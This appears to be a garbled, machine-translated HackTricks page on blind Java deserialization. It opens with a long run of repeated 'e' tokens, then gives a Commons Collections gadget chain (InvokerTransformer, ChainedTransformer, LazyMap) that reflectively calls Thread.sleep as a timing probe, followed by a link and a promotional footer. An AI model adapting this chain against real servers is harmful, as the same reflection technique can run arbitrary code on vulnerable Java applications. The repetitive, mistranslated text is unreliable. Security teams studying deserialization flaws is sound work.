**'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'
|
|
```java
|
|
import org.apache.commons.*;
|
|
import org.apache.commons.collections.*;
|
|
import org.apache.commons.collections.functors.*;
|
|
import org.apache.commons.collections.map.*;
|
|
import java.io.*;
|
|
import java.lang.reflect.InvocationTargetException;
|
|
import java.net.MalformedURLException;
|
|
import java.net.URL;
|
|
import java.util.Map;
|
|
import java.util.HashMap;
|
|
|
|
public class CommonsCollections1Sleep {
|
|
public static void main(String... args) {
|
|
final Transformer[] transformers = new Transformer[]{
|
|
new ConstantTransformer(Thread.class),
|
|
new InvokerTransformer("getMethod",
|
|
new Class[]{
|
|
String.class, Class[].class
|
|
},
|
|
new Object[]{
|
|
"sleep", new Class[]{Long.TYPE}
|
|
}),
|
|
new InvokerTransformer("invoke",
|
|
new Class[]{
|
|
Object.class, Object[].class
|
|
}, new Object[]
|
|
{
|
|
null, new Object[] {7000L}
|
|
}),
|
|
};
|
|
|
|
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
|
|
Map map = new HashMap<>();
|
|
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
|
|
|
|
//Execute gadgets
|
|
lazyMap.get("anything");
|
|
|
|
}
|
|
}
|
|
```
|
|
## nIvbogh Gadgets
|
|
|
|
nIvbogh gadgets vItlhutlh: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
|
|
|
|
##
|
|
|
|
<details>
|
|
|
|
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>DaH jImej</strong></a><strong>!</strong></summary>
|
|
|
|
* **DaH jImej** 'oH **cybersecurity company**? **HackTricks** vItlhutlh **company advertised** vay' **company**? 'ej **latest version** PEASS **download** HackTricks **PDF**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **check**!
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, **exclusive NFTs** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **collection**.
|
|
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
|
|
* **Join** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group** [**follow**](https://t.me/peass) **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **hacking tricks** **Share** PRs **hacktricks repo** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **submitting**.
|
|
|
|
</details>
|